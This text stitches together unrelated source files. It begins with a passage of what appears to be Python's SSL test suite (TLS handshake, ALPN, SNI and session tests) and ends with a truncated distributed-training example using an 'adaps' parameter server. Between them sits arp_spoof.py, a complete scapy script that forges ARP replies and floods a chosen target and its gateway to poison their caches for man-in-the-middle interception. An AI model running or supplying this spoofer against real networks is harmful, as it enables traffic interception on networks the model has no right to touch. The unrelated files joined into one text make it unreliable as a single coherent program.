('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if ssl.OPENSSL_VERSION_INFO >= (1, 1, 1):
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS13-AES-256-GCM-SHA384',
'TLS13-CHACHA20-POLY1305-SHA256',
'TLS13-AES-128-GCM-SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
# client 1.0 to 1.2, server 1.0 to 1.1
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
# client 1.0, server 1.2 (mismatch)
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
@unittest.skipUnless(ssl.HAS_SSLv3, "requires SSLv3 support")
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# TODO: fix TLSv1.3 support
client_context.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not alg1 in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
arp_spoof.py
|
#!/usr/bin/env python3
from scapy.all import *
import sys
import threading
def arp_flood(packet1,packet2):
print('Spamming ARP packets...')
while True:
send(packet1,verbose = 0)
send(packet2,verbose = 0)
def get_mac(ip):
#Scapy has a similar method called getmacfromip() but often randomly times out
#This method seems to produce more consistent results
mac_packet = ARP(pdst = ip)
rpsd = sr1(mac_packet,verbose = 0)
return rpsd.hwsrc
def main():
gw = conf.route.route("0.0.0.0")[2]
gw_mac = get_mac(gw)
print('GATEWAY IP: ' + str(gw))
print('GATEWAY MAC: ' + str(gw_mac))
target = sys.argv[1]
target_mac = get_mac(target)
print('TARGET IP: ' + str(target))
print('TARGET MAC: ' + str(target_mac))
#Prepare the spoofed packets
packet_gateway = ARP(pdst = str(gw),hwdst = str(gw_mac),psrc = str(target))
packet_target = ARP(pdst = str(target),hwdst = str(target_mac),psrc = str(gw))
t = threading.Thread(target = arp_flood, args=(packet_gateway,packet_target))
t.start()
if __name__=="__main__":
main()
|
example.py
|
#!/usr/bin/env python3
import os
import torch
import torch.distributed as dist
import numpy as np
from torch.multiprocessing import Process
import adaps
from signal import signal, SIGINT
from sys import exit
import threading
num_nodes = 4 # number of nodes
num_workers_per_node = 2 # number of worker threads per node
num_keys = 1000 # number of keys
vpk = 2 # length of the parameter vector that one key holds
localip = '127.0.0.1'
port = '9091'
def run_worker(worker_id, rank, kv):
if worker_id == 0:
print("""\n
---------------------------------------------------
Run example with PyTorch tensors
----------------------------------------------------
""")
worker_torch(worker_id, rank, kv)
kv.barrier() # wait for all workers to finish
if worker_id == 0:
print("""\n
---------------------------------------------------
Run example with NumPy arrays
----------------------------------------------------
""")
worker_numpy(worker_id, rank, kv)
kv.barrier() # wait for all workers to finish
kv.finalize()
def worker_numpy(worker_id, rank, kv):
"""Example worker, using numpy arrays"""
print("run worker " + str(worker_id) + " on server rank " + str(rank) + ", using NumPy arrays")
try:
np.random.seed(worker_id)
keys = np.array([1,2,3,4])
keys2 = np.array([1,333,666,960])+worker_id
vals = np.ones((len(keys)*vpk), dtype=np.float32)
pushvals = np.random.rand(len(keys2)*vpk).astype(np.float32)
setvals = np.ones((len(keys)*vpk), dtype=np.float32)
# pull
kv.pull(keys, vals)
print("worker " + str(worker_id) + " pulled " + str(vals))
# localize
kv.intent(keys2, kv.current_clock()+1)
kv.advance_clock()
kv.wait_sync()
# push
print("worker " + str(worker_id) + " pushes " + str(pushvals))
